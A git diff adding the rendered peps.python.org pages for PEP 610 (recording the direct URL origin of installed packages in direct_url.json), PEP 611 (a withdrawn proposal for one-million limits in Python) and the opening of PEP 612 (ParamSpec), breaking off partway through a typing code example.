+ + + + + \ No newline at end of file diff --git a/pep-0610/index.html b/pep-0610/index.html new file mode 100644 index 00000000000..057919e8fea --- /dev/null +++ b/pep-0610/index.html @@ -0,0 +1,661 @@ + + + + + + + + PEP 610 – Recording the Direct URL Origin of installed distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 610 – Recording the Direct URL Origin of installed distributions

+
+
Author:
+
Stéphane Bidoul <stephane.bidoul at gmail.com>, Chris Jerdonek <chris.jerdonek at gmail.com>
+
Sponsor:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Pradyun Gedam <pradyunsg at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
21-Apr-2019
+
Post-History:
+

+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Recording the Direct URL Origin of installed distributions, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

Following PEP 440, a distribution can be identified by a name and either a +version, or a direct URL reference (see PEP440 Direct References). +After installation, the name and version are captured in the project metadata, +but currently there is no way to obtain details of the URL used when the +distribution was identified by a direct URL reference.

+

This proposal defines +additional metadata, to be added to the installed distribution by the +installation front end, which records the Direct URL Origin for use by +consumers which introspect the database of installed packages (see PEP 376).

+
+
+

Motivation

+

The original motivation of this PEP was to permit tools with a “freeze” +operation allowing a Python environment to be recreated to work in a broader +range of situations.

+

Specifically, the PEP originated from the desire to address pip issue #609: +i.e. improving the behavior of pip freeze in the presence of distributions +installed from direct URL references. It follows a +thread on discuss.python.org about the best course of action to implement +it.

+
+

Installation from direct URL references

+

Python installers such as pip are capable of downloading and installing +distributions from package indexes. They are also capable of downloading +and installing source code from requirements specifying arbitrary URLs of +source archives and Version Control Systems (VCS) repositories, +as standardized in PEP440 Direct References.

+

In other words, two relevant installation modes exist.

+
    +
1. The package to install is specified as a name and version specifier:

   In this case, the installer looks in a package index (or optionally
   using --find-links in the case of pip) to find the distribution to install.

2. The package to install is specified as a direct URL reference:

   In this case, the installer downloads whatever is specified by the URL
   (typically a wheel, a source archive or a VCS repository) and installs it.

   In this mode, installers typically download the source code in a
   temporary directory, invoke the PEP 517 build backend to produce a wheel
   if needed, install the wheel, and delete the temporary directory.

+

After installation, no trace of the URL the user requested to download the package is left on the user's system.

+
+
+
+

Freezing an environment

+

Pip also sports a command named pip freeze which examines the Database of Installed Python Distributions to generate a list of requirements. The main goal of this command is to help users generate a list of requirements that will later allow re-installation of the same environment with the highest possible fidelity.

+

As of pip version 19.3, the pip freeze command outputs a name==version +line for each installed +distribution (except for editable installs). To achieve the goal of +reinstalling the same environment, this requires the (name, version) +tuple to refer to an immutable version of the +distribution. The immutability is guaranteed by package indexes +such as Warehouse. The package index to use is typically known from +environmental or command line parameters of the installer.

+

This freeze mechanism therefore works fine for installation mode 1 (i.e. +when the package to install was specified as a name plus version specifier).

+

For installation mode 2, i.e. when the package to install was specified as a +direct URL reference, the name==version tuple is obviously not sufficient +to reinstall the same distribution and users of the freeze command expect it +to output the URL that was originally requested.

+

The reasoning above is equally applicable to tools, other than pip freeze, +that would attempt to generate a Pipfile.lock or any other similar format +from the Database of Installed Python Distributions. Unless specified +otherwise, “freeze” is used in this document as a generic term for such +an operation.

+
+
+

The importance of installing from (VCS) URLs for application integrators

+

For an application integrator, it is important to be able to reliably install and freeze unreleased versions of Python distributions. For instance, when a developer needs to deploy an unreleased patched version of a dependency, it is common to install the dependency directly from a VCS branch that has the patch, while waiting for the maintainer to release an updated version.

+

In such cases, it is important for “freeze” to pin the exact VCS +reference (commit-hash if available) that was installed, in order to create +reproducible builds with the highest possible fidelity.

+
+
+

Additional origin metadata available for VCS URLs

+

For VCS URLs, there is additional origin information available only at +install time useful for introspection and certain workflows. For example, +when installing a revision from a VCS URL, a tool can determine if the +revision corresponds to a branch, tag or (in the case of Git) a ref. This +information can be used when introspecting the Database of Installed Distributions +to communicate to users more information about what version was installed +(e.g. whether a branch or tag was installed and, if so, the name of the +branch or tag). This also permits one to know whether a PEP 440 direct +reference URL can be constructed using the tag form, as only tags have the +semantics of immutability.

+

In cases where the revision is mutable (e.g. branches and Git refs), knowing +this information enables workflows where users can e.g. update to the latest +version of a branch they are tracking, or update to the latest version of a +pull request they are reviewing locally. In contrast, when the revision is a +tag, tools can know in advance (e.g. without network calls) that no update is +needed.

+

As with the URL itself, if this information isn’t recorded at install time +when the VCS repository is available, it would otherwise be lost.

+
+
+

Note about “editable” installs

+

The editable installation mode of pip roughly lets a user insert a local directory in sys.path for development purposes. This mode is somewhat abused to work around the fact that a non-editable install from a VCS URL loses track of the origin after installation. Indeed, editable installs implicitly record the VCS origin in the checkout directory, so the information can be recovered when running “freeze”.

+

The use of this workaround, although useful, is fragile, creates confusion +about the purpose of the editable mode, and works only when the distribution +can be installed with setuptools (i.e. it is not usable with other PEP 517 +build backends).

+

When this PEP is implemented, it will not be necessary anymore to use +editable installs for the purpose of making pip freeze work correctly with +VCS references.

+
+
+
+

Rationale

+

This PEP specifies a new direct_url.json metadata file in the +.dist-info directory of an installed distribution.

+

The fields specified are sufficient to reproduce the source archive and VCS +URLs supported by pip. They are also sufficient to reproduce +PEP440 Direct References, +as well as Pipfile and Pipfile.lock entries. Finally, they +are sufficient to record the branch, tag, and/or Git ref origin of the +installed version that is already available for editable installs by virtue +of a VCS checkout being present.

+

Since at least three different ways already exist to encode this type of information, this PEP uses a dictionary format, so as not to make any assumptions about how a direct URL reference must ultimately be encoded in a requirement or lockfile. See also the Alternatives section below for more discussion about this choice.

+

Information has been taken from Ruby's bundler manual to verify that it has similar capabilities, and to inform the selection and naming of fields in this specification.

+

The JSON format allows for the addition of further fields in the future.

+
+
+

Specification

+

This PEP specifies a direct_url.json file in the .dist-info directory +of an installed distribution, to record the Direct URL Origin of the distribution.

+

The canonical source for the name and semantics of this metadata file is +the Recording the Direct URL Origin of installed distributions document.

+

This file MUST be created by installers when installing a distribution +from a requirement specifying a direct URL reference (including a VCS URL).

+

This file MUST NOT be created when installing a distribution from another type of requirement (i.e. name plus version specifier).

+

This JSON file MUST be a dictionary, compliant with RFC 8259 and UTF-8 +encoded.

+

If present, it MUST contain at least two fields. The first one is url, with type string. Depending on what url refers to, the second field MUST be one of vcs_info (if url is a VCS reference), archive_info (if url is a source archive or a wheel), or dir_info (if url is a local directory). These info fields have a (possibly empty) subdictionary as value, with the possible keys defined below.

+

url MUST be stripped of any sensitive authentication information, +for security reasons.

+

The user:password section of the URL MAY however +be composed of environment variables, matching the following regular +expression:

+
\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?
+
+
+

Additionally, the user:password section of the URL MAY be a well-known, non security sensitive string. A typical example is git in the case of a URL such as ssh://git@gitlab.com.
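As a non-normative illustration, a minimal sketch of checking a user:password section against the regular expression above (the helper name is hypothetical):

import re

# Accept only environment variable references in the userinfo part;
# well-known strings such as "git" would be handled separately.
ENV_VAR_USERINFO = re.compile(r"^\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?$")

assert ENV_VAR_USERINFO.match("${USER}:${PASSWORD}")
assert ENV_VAR_USERINFO.match("${TOKEN}")
assert not ENV_VAR_USERINFO.match("alice:secret")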

+

When url refers to a VCS repository, the vcs_info key MUST be present +as a dictionary with the following keys:

+
    +
  • A vcs key (type string) MUST be present, containing the name of the VCS +(i.e. one of git, hg, bzr, svn). Other VCS’s SHOULD be registered by +writing a PEP to amend this specification. +The url value MUST be compatible with the corresponding VCS, +so an installer can hand it off without transformation to a +checkout/download command of the VCS.
  • +
  • A requested_revision key (type string) MAY be present naming a +branch/tag/ref/commit/revision/etc (in a format compatible with the VCS) +to install.
  • +
  • A commit_id key (type string) MUST be present, containing the +exact commit/revision number that was installed. +If the VCS supports commit-hash +based revision identifiers, such commit-hash MUST be used as +commit_id in order to reference the immutable +version of the source code that was installed.
  • +
  • If the installer could discover additional information about +the requested revision, it MAY add a resolved_revision and/or +resolved_revision_type field. If no revision was provided in +the requested URL, resolved_revision MAY contain the default branch +that was installed, and resolved_revision_type will be branch. +If the installer determines that requested_revision was a tag, it MAY +add resolved_revision_type with value tag.
  • +
+

When url refers to a source archive or a wheel, the archive_info key +MUST be present as a dictionary with the following key:

+
    +
  • A hash key (type string) SHOULD be present, with value +<hash-algorithm>=<expected-hash>. +It is RECOMMENDED that only hashes which are unconditionally provided by +the latest version of the standard library’s hashlib module be used for +source archive hashes. At time of writing, that list consists of ‘md5’, +‘sha1’, ‘sha224’, ‘sha256’, ‘sha384’, and ‘sha512’.
  • +
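As a non-normative illustration, a minimal sketch of producing such a hash value with the standard library's hashlib (the helper name is hypothetical):

import hashlib

def archive_hash(path, algorithm="sha256"):
    # Build the archive_info "hash" value, in
    # "<hash-algorithm>=<expected-hash>" form, for a downloaded archive.
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return "{}={}".format(algorithm, h.hexdigest())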
+

When url refers to a local directory, the dir_info key MUST be +present as a dictionary with the following key:

+
    +
  • editable (type: boolean): true if the distribution was installed +in editable mode, false otherwise. If absent, default to false.
  • +
+

When url refers to a local directory, it MUST have the file scheme +and be compliant with RFC 8089. In particular, the path component must +be absolute. Symbolic links SHOULD be preserved when making relative +paths absolute.

+
+

Note

+

When the requested URL has the file:// scheme and points to a local directory that happens to contain a +VCS checkout, installers MUST NOT attempt to infer any VCS information and +therefore MUST NOT output any VCS related information (such as vcs_info) +in direct_url.json.

+
+

A top-level subdirectory field MAY be present containing a directory path, +relative to the root of the VCS repository, source archive or local directory, +to specify where pyproject.toml or setup.py is located.

+
+

Note

+

As a general rule, installers should as much as possible preserve the +information that was provided in the requested URL when generating +direct_url.json. For example, user:password environment variables +should be preserved and requested_revision should reflect the revision that was +provided in the requested URL as faithfully as possible. This information is +however enriched with more precise data, such as commit_id.

+
+
+

Registered VCS

+

This section lists the registered VCS’s; expanded, VCS-specific information +on how to use the vcs, requested_revision, and other fields of +vcs_info; and in +some cases additional VCS-specific fields. +Tools MAY support other VCS’s although it is RECOMMENDED to register +them by writing a PEP to amend this specification. The vcs field SHOULD be the command name +(lowercased). Additional fields that would be necessary to +support such VCS SHOULD be prefixed with the VCS command name.

+
+

Git

+

Home page

+
+
+

vcs command

+
+
git
+

vcs field

+
+
git
+

requested_revision field

+
+
A tag name, branch name, Git ref, commit hash, shortened commit hash, +or other commit-ish.
+

commit_id field

+
+
A commit hash (40 hexadecimal characters sha1).
+
+

Note

+

Installers can use the git show-ref and git symbolic-ref commands +to determine if the requested_revision corresponds to a Git ref. +In turn, a ref beginning with refs/tags/ corresponds to a tag, and +a ref beginning with refs/remotes/origin/ after cloning corresponds +to a branch.
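A minimal, non-normative sketch of such a check (the function name is hypothetical, and a cloned repository with a remote named origin is assumed):

import subprocess

def classify_revision(repo_dir, revision):
    # Returns "tag", "branch", or None, using `git show-ref --verify`
    # to test whether the revision names a known ref.
    candidates = [
        ("refs/tags/" + revision, "tag"),
        ("refs/remotes/origin/" + revision, "branch"),
    ]
    for ref, kind in candidates:
        result = subprocess.run(
            ["git", "show-ref", "--verify", "--quiet", ref],
            cwd=repo_dir,
        )
        if result.returncode == 0:
            return kind
    return None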

+
+
+
+

Mercurial

+

Home page

+
+
+

vcs command

+
+
hg
+

vcs field

+
+
hg
+

requested_revision field

+
+
A tag name, branch name, changeset ID, shortened changeset ID.
+

commit_id field

+
+
A changeset ID (40 hexadecimal characters).
+
+
+

Bazaar

+

Home page

+
+
+

vcs command

+
+
bzr
+

vcs field

+
+
bzr
+

requested_revision field

+
+
A tag name, branch name, revision id.
+

commit_id field

+
+
A revision id.
+
+
+

Subversion

+

Home page

+
+
+

vcs command

+
+
svn
+

vcs field

+
+
svn
+

requested_revision field

+
+
requested_revision must be compatible with the svn checkout --revision option. In Subversion, the branch or tag is part of url.
+

commit_id field

+
+
Since Subversion does not support globally unique identifiers, +this field is the Subversion revision number in the corresponding +repository.
+
+
+
+
+

Examples

+
+

Example direct_url.json

+

Source archive:

+
{
+    "url": "https://github.com/pypa/pip/archive/1.3.1.zip",
+    "archive_info": {
+        "hash": "sha256=2dc6b5a470a1bde68946f263f1af1515a2574a150a30d6ce02c6ff742fcc0db8"
+    }
+}
+
+
+

Git URL with tag and commit-hash:

+
{
+    "url": "https://github.com/pypa/pip.git",
+    "vcs_info": {
+        "vcs": "git",
+        "requested_revision": "1.3.1",
+        "resolved_revision_type": "tag",
+        "commit_id": "7921be1537eac1e97bc40179a57f0349c2aee67d"
+    }
+}
+
+
+

Local directory:

+
{
+    "url": "file:///home/user/project",
+    "dir_info": {}
+}
+
+
+

Local directory installed in editable mode:

+
{
+    "url": "file:///home/user/project",
+    "dir_info": {
+        "editable": true
+    }
+}
+
+
+
+
+

Example pip commands and their effect on direct_url.json

+

Commands that generate a direct_url.json:

+
    +
  • pip install https://example.com/app-1.0.tgz
  • +
  • pip install https://example.com/app-1.0.whl
  • +
  • pip install "git+https://example.com/repo/app.git#egg=app&subdirectory=setup"
  • +
  • pip install ./app
  • +
  • pip install file:///home/user/app
  • +
  • pip install --editable "git+https://example.com/repo/app.git#egg=app&subdirectory=setup" (in which case, url will be the local directory where the git repository has been cloned to, and dir_info will be present with "editable": true and no vcs_info will be set)
  • +
  • pip install -e ./app
  • +
+

Commands that do not generate a direct_url.json

+ +
+
+
+

Use cases

+

“Freezing” an environment

+
+
Tools, such as pip freeze, which generate requirements from the Database +of Installed Python Distributions SHOULD exploit direct_url.json +if it is present, and give it priority over the Version metadata in order +to generate a higher fidelity output. In the presence of a vcs direct URL reference, +the commit_id field SHOULD be used in priority in order to provide +the highest possible fidelity to the originally installed version. If +supported by their requirement format, tools are encouraged also to output +the tag value if present, as it has immutable semantics. +Tools MAY choose another approach, depending on the needs of their users.

Note the initial iteration of this PEP does not attempt to make environments +that include editable installs or installs from local directories +reproducible, but it does attempt to make them readily identifiable. By +locating the local project directory via the url and dir_info fields +of this specification, tools can implement any strategy that fits their use +cases.
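As a non-normative illustration, a sketch of how a freeze tool might consume this metadata (assuming Python 3.8+ importlib.metadata; the exact requirement syntax emitted is left to the tool):

import json
from importlib.metadata import distributions

for dist in distributions():
    raw = dist.read_text("direct_url.json")
    if raw is None:
        # Regular index-based install: fall back to name==version.
        print("{}=={}".format(dist.metadata["Name"], dist.version))
        continue
    direct_url = json.loads(raw)
    vcs_info = direct_url.get("vcs_info")
    if vcs_info is not None:
        # Pin the immutable commit_id for the highest fidelity.
        print("{} @ {}+{}@{}".format(
            dist.metadata["Name"], vcs_info["vcs"],
            direct_url["url"], vcs_info["commit_id"]))
    else:
        print("{} @ {}".format(dist.metadata["Name"], direct_url["url"]))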

+
+
+
+

Backwards Compatibility

+

Since this PEP specifies a new file in the .dist-info directory, +there are no backwards compatibility implications.

+
+
+

Alternatives

+
+

PEP 426 source_url

+

The now withdrawn PEP 426 specifies a source_url metadata entry. +It is also implemented in distlib.

+

It was intended for a slightly different purpose, for use in sdists.

+

This format lacks support for the subdirectory option of pip requirement +URLs. The same limitation is present in PEP440 Direct References.

+

It also lacks explicit support for environment variables in the user:password +part of URLs.

+

The introduction of a key/value extensibility mechanism and support for environment variables for user:password in PEP 440 would be necessary for use in this PEP.

+
+
+

revision vs ref

+

The requested_revision key was retained over requested_ref, as it is a more generic term across various VCSs, and ref has a specific meaning in Git.

+
+
+
+

Acknowledgements

+

Various people helped make this PEP a reality. Paul F. Moore provided the +essence of the abstract. Alyssa Coghlan suggested the direct_url name.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0610.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0611/index.html b/pep-0611/index.html new file mode 100644 index 00000000000..7ba0ea16148 --- /dev/null +++ b/pep-0611/index.html @@ -0,0 +1,475 @@ + + + + + + + + PEP 611 – The one million limit | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 611 – The one million limit

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
05-Dec-2019
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a soft limit of one million (1 000 000), and a larger hard limit, for various aspects of Python code and its implementation.

+

The Python language does not specify limits for many of its features. +Not having any limit to these values seems to enhance programmer freedom, +at least superficially, but in practice the CPython VM and other Python virtual +machines have implicit limits or are forced to assume that the limits are +astronomical, which is expensive.

+

This PEP lists a number of features which are to have a limit of one million.

+

For CPython the hard limit will be eight million (8 000 000).

+
+
+

Motivation

+

There are many values that need to be represented in a virtual machine. +If no limit is specified for these values, +then the representation must either be inefficient or vulnerable to overflow. +The CPython virtual machine represents values like line numbers, +stack offsets and instruction offsets by 32 bit values. This is inefficient, and potentially unsafe.

+

It is inefficient as actual values rarely need more than a dozen or so bits to represent them.

+

It is unsafe as malicious or poorly generated code could cause values to exceed 2³².

+

For example, line numbers are represented by 32 bit values internally. This is inefficient, given that modules almost never exceed a few thousand lines. Despite being inefficient, it is still vulnerable to overflow as it is easy for an attacker to create a module with billions of newline characters.

+

Memory access is usually a limiting factor in the performance of modern CPUs. +Better packing of data structures enhances locality and reduces memory bandwidth, +at a modest increase in ALU usage (for shifting and masking). +Being able to safely store important values in 20 bits would allow memory savings +in several data structures including, but not limited to:

+
    +
  • Frame objects
  • +
  • Object headers
  • +
  • Code objects
  • +
+

There is also the potential for a more efficient instruction format, speeding up interpreter dispatch.

+
+

Is this a worthwhile trade off?

+

The downside of any form of limit is that it might potentially make someone’s job harder, +for example, it may be harder to write a code generator that keeps the size of modules to one million lines. +However, it is the author’s opinion, having written many code generators, +that such a limit is extremely unlikely to be a problem in practice.

+

The upside of these limits is the freedom they grant implementers of runtimes, whether CPython, PyPy, or any other implementation, to improve performance. It is the author's belief that the potential value of even a 0.1% reduction in the cost of running Python programs globally will hugely exceed the cost of modifying a handful of code generators.

+
+
+
+

Rationale

+

Imposing a limit on values such as lines of code in a module, and the number of local variables, +has significant advantages for ease of implementation and efficiency of virtual machines. +If the limit is sufficiently large, there is no adverse effect on users of the language.

+

By selecting a fixed but large limit for these values, +it is possible to have both safety and efficiency whilst causing no inconvenience to human programmers +and only very rare problems for code generators.

+
+

One million

+

The value “one million” is very easy to remember.

+

The one million limit is mostly a limit on human generated code, not runtime sizes.

+

One million lines in a single module is a ridiculous concentration of code; the entire Python standard library is about two-thirds of a million lines, spread over 1600 files.

+

The Java Virtual Machine (JVM) [1] specifies a limit of 2¹⁶−1 (65535) for many program elements similar to those covered here. This limit enables limited values to fit in 16 bits, which is a very efficient machine representation. However, this limit is quite easily exceeded in practice by code generators, and the author is aware of existing Python code that already exceeds 2¹⁶ lines of code.

+

The hard limit of eight million fits into 23 bits which, although not as convenient for machine representation, +is still reasonably compact. +A limit of eight million is small enough for efficiency advantages (only 23 bits), +but large enough not to impact users (no one has ever written a module that large).

+

While it is possible that generated code could exceed the limit, +it is easy for a code generator to modify its output to conform. +The author has hit the 64K limit in the JVM on at least two occasions when generating Java code. +The workarounds were relatively straightforward and wouldn’t +have been necessary with a limit of one million bytecodes or lines of code.

+

Where necessary, the soft limit can be increased for those programs that exceed the one million limit.

+

Having a soft limit of one million provides a warning of problematic code, without causing an error and forcing an immediate fix. +It also allows dynamic optimizers to use more compact formats without inline checks.

+
+
+
+

Specification

+

This PEP proposes that the following language features and runtime values have a soft limit of one million.

+
    +
  • The number of source code lines in a module
  • +
  • The number of bytecode instructions in a code object.
  • +
  • The sum of local variables and stack usage for a code object.
  • +
  • The number of classes in a running interpreter.
  • +
  • The recursion depth of Python code.
  • +
+

It is likely that memory constraints would be a limiting factor before the number of classes reaches one million.

+
+

Recursion depth

+

The recursion depth limit only applies to pure Python code. Code written in a foreign language, such as C, may consume hardware stack and thus be limited to a recursion depth of a few thousand. It is expected that implementations will raise an exception should the hardware stack get close to its limit. For code that mixes Python and C calls, it is most likely that the hardware limit will apply first. The available hardware recursion depth may vary at runtime and will not be visible.

+
+
+
+

Soft and hard limits

+

Implementations should emit a warning whenever a soft limit is exceeded, unless the hard limit has the same value as the soft limit. +When a hard limit is exceeded, then an exception should be raised.

+

Depending on the implementation, different hard limits might apply. In some cases the hard limit might be below the soft limit. For example, many MicroPython ports are unlikely to be able to support such large limits.

+
+

Introspecting and modifying the limits

+

One or more functions will be provided in the sys module to introspect or modify the soft limits at runtime, +but the limits may not be raised above the hard limit.

+
+
+

Inferred limits

+

These limits are not part of the specification, but a limit of less than one million can be inferred from the limit on the number of bytecode instructions in a code object, since there would be insufficient instructions to load more than one million constants or use more than one million names:

+
    +
  • The number of distinct names in a code object.
  • +
  • The number of constants in a code object.
  • +
+
+
+

The advantages for CPython of imposing these limits:

+
+

Lines of code in a module and code object restrictions.

+

When compiling source code to bytecode or modifying bytecode for profiling or debugging, +an intermediate form is required. By limiting operands to 23 bits, +instructions can be represented in a compact 64 bit form allowing +very fast passes over the instruction sequence.

+

Having 23 bit operands (24 bits for relative branches) allows instructions to fit into 32 bits without needing additional EXTENDED_ARG instructions. This improves dispatch, as the operand is strictly local to the instruction. It is unclear whether this would help performance; it is merely an example of what is possible.
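As a purely illustrative sketch of such a packing (the 9/23 bit split is just one possible layout, not a specified format):

OPCODE_BITS = 9
OPERAND_BITS = 23   # the 8 million hard limit fits: 8_000_000 < 2**23

def pack(opcode, operand):
    # Pack one instruction into a single 32 bit word.
    assert 0 <= opcode < (1 << OPCODE_BITS)
    assert 0 <= operand < (1 << OPERAND_BITS)
    return (opcode << OPERAND_BITS) | operand

def unpack(word):
    # Recover (opcode, operand) from a packed 32 bit word.
    return word >> OPERAND_BITS, word & ((1 << OPERAND_BITS) - 1)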

+

The benefit of restricting the number of lines in a module is primarily the implied limit on bytecodes. It is more important for implementations that it is instructions per code object, not lines per module, that is limited to one million, but it is much easier to explain a one million line limit. Having a consistent limit of one million is just easier to remember. It is most likely, although not guaranteed, that the line limit will be hit first and thus provide a simpler-to-understand error message to the developer.

+
+
+

Total number of classes in a running interpreter

+

This limit has the potential to reduce the size of object headers considerably.

+

Currently objects have a two word header, for objects without references +(int, float, str, etc.) or a four word header for objects with references. +By reducing the maximum number of classes, the space for the class reference +can be reduced from 64 bits to fewer than 32 bits allowing a much more compact header.

+

For example, a super-compact header format might look like this:

+
struct header {
+    uint32_t gc_flags:6; /* Needs finalisation, might be part of a cycle, etc. */
+    uint32_t class_id:26; /* Can be efficiently mapped to address by ensuring suitable alignment of classes */
+    uint32_t refcount; /* Limited memory or saturating */
+}
+
+
+

This format would reduce the size of a Python object without slots, on a 64 bit machine, from 40 to 16 bytes.

+

Note that there are two ways to use a 32 bit refcount on a 64 bit machine. One is to limit each sub-interpreter to 32 GB of memory: since each reference needs a pointer of at least 8 bytes, 2³² references would require 2³² × 8 bytes = 32 GB, so a 32 bit reference count cannot overflow. The other is to use a saturating reference count, which would be a little bit slower, but allow unlimited memory allocation.

+
+
+
+

Enforcement

+

Python implementations are not obliged to enforce the limits. +However, if a limit can be enforced without hurting performance, then it should be.

+

It is anticipated that CPython will enforce the limits as follows:

+
    +
  • The number of source code lines in a module: version 3.9 onward.
  • +
  • The number of bytecode instructions in a code object: 3.9 onward.
  • +
  • The sum of local variables and stack usage for a code object: 3.9 onward.
  • +
  • The number of classes in a running interpreter: probably 3.10 onward, maybe warning in 3.9.
  • +
+
+
+
+

Hard limits in CPython

+

CPython will enforce a hard limit on all the above values. The value of the hard limit will be 8 million.

+

It is hypothetically possible that some machine generated code exceeds one or more of the above limits. +The author believes that to be incredibly unlikely and easily fixed by modifying the output stage of the code generator.

+

We would like to gain the benefit from the above limits for performance as soon as possible. +To that end, CPython will start applying limits from version 3.9 onward. +To ease the transition and minimize breakage, the initial limits will be 16 million, reducing to 8 million in a later version.

+
+
+

Backwards Compatibility

+

The actual hard limits enforced by CPython will be:

+ + + + + + + + + + + + + + +
Version        Hard limit
3.9            16 million
3.10 onward    8 million
+

Given the rarity of code generators that would exceed the one million limits, +and the environments in which they are typically used, it seems reasonable +to start issuing warnings in 3.9 if any limited quantity exceeds one million.

+

Historically the recursion limit has been set at 1000. To avoid breaking code that implicitly relies on the value being small, +the soft recursion limit will be increased gradually, as follows:

+ + + + + + + + + + + + + + + + + + + + + + + +
Version    Soft limit
3.9        4 000
3.10       16 000
3.11       64 000
3.12       125 000
3.13       1 million
+

The hard limit will be set to 8 million immediately.
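For reference, the existing soft recursion limit can already be inspected and adjusted at runtime through sys (this is today's API, not the new limit-introspection functions this PEP defers to the sys module):

import sys

print(sys.getrecursionlimit())  # 1000 by default today
sys.setrecursionlimit(4000)     # e.g. the proposed 3.9 soft limit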

+
+
+

Other implementations

+

Implementations of Python other than CPython have different purposes, so different limits might be appropriate. +This is acceptable, provided the limits are clearly documented.

+
+

General purpose implementations

+

General purpose implementations, such as PyPy, should use the one million limit. +If maximum compatibility is a goal, then they should also follow CPython’s behaviour for 3.9 to 3.11.

+
+
+

Special purpose implementations

+

Special purpose implementations may use lower limits, as long as they are clearly documented. +An implementation designed for embedded systems, for example MicroPython, might impose limits as low as a few thousand.

+
+
+
+

Security Implications

+

Minimal. This reduces the attack surface of any Python virtual machine by a small amount.

+
+
+

Reference Implementation

+

None, as yet. This will be implemented in CPython, once the PEP has been accepted.

+
+
+

Rejected Ideas

+

Being able to modify the hard limits upwards at compile time was suggested by Tal Einat. This is rejected as the current limits of 2³² have not been an issue, and the practical advantages of allowing limits between 2²⁰ and 2³² seem slight compared to the additional code complexity of supporting such a feature.

+
+
+

Open Issues

+

None, as yet.

+
+
+

References

+ +

[1] The Java Virtual Machine Specification, Java SE 8 Edition: https://docs.oracle.com/javase/specs/jvms/se8/jvms8.pdf

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0611.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0612/index.html b/pep-0612/index.html new file mode 100644 index 00000000000..a79b22ff6b0 --- /dev/null +++ b/pep-0612/index.html @@ -0,0 +1,886 @@ + + + + + + + + PEP 612 – Parameter Specification Variables | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 612 – Parameter Specification Variables

+
+
Author:
+
Mark Mendoza <mendoza.mark.a at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
18-Dec-2019
+
Python-Version:
+
3.10
+
Post-History:
+
18-Dec-2019, 13-Jul-2020
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see ParamSpec and +typing.ParamSpec for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

There currently are two ways to specify the type of a callable, the +Callable[[int, str], bool] syntax defined in PEP 484, +and callback protocols from PEP +544. Neither of +these support forwarding the parameter types of one callable over to another +callable, making it difficult to annotate function decorators. This PEP proposes +typing.ParamSpec and typing.Concatenate to +support expressing these kinds of relationships.

+
+
+

Motivation

+

The existing standards for annotating higher order functions don’t give us the +tools to annotate the following common decorator pattern satisfactorily:

+
from typing import Awaitable, Callable, TypeVar
+
+R = TypeVar("R")
+
+def add_logging(f: Callable[..., R]) -> Callable[..., Awaitable[R]]:
+  async def inner(*args: object, **kwargs: object) -> R:
+    await log_to_database()
+    return f(*args, **kwargs)
+  return inner
+
+@add_logging
+def takes_int_str(x: int, y: str) -> int:
+  return x + 7
+
+await takes_int_str(1, "A")
+await takes_int_str("B", 2) # fails at runtime
+
+
+

add_logging, a decorator which logs before each entry into the decorated +function, is an instance of the Python idiom of one function passing all +arguments given to it over to another function. This is done through the +combination of the *args and **kwargs features in both parameters and in +arguments. When one defines a function (like inner) that takes (*args, +**kwargs) and goes on to call another function with (*args, **kwargs), +the wrapping function can only be safely called in all of the ways that the +wrapped function could be safely called. To type this decorator, we’d like to be +able to place a dependency between the parameters of the callable f and the +parameters of the returned function. PEP 484 +supports dependencies between +single types, as in def append(l: typing.List[T], e: T) -> typing.List[T]: +..., but there is no existing way to do so with a complicated entity like +the parameters of a function.

+

Due to the limitations of the status quo, the add_logging example will type +check but will fail at runtime. inner will pass the string “B” into +takes_int_str, which will try to add 7 to it, triggering a type error. +This was not caught by the type checker because the decorated takes_int_str +was given the type Callable[..., Awaitable[int]] (an ellipsis in place of +parameter types is specified to mean that we do no validation on arguments).

+

Without the ability to define dependencies between the parameters of different +callable types, there is no way, at present, to make add_logging compatible +with all functions, while still preserving the enforcement of the parameters of +the decorated function.

+

With the addition of the ParamSpec variables proposed by this +PEP, we can rewrite the previous example in a way that keeps the flexibility of +the decorator and the parameter enforcement of the decorated function.

+
from typing import Awaitable, Callable, ParamSpec, TypeVar
+
+P = ParamSpec("P")
+R = TypeVar("R")
+
+def add_logging(f: Callable[P, R]) -> Callable[P, Awaitable[R]]:
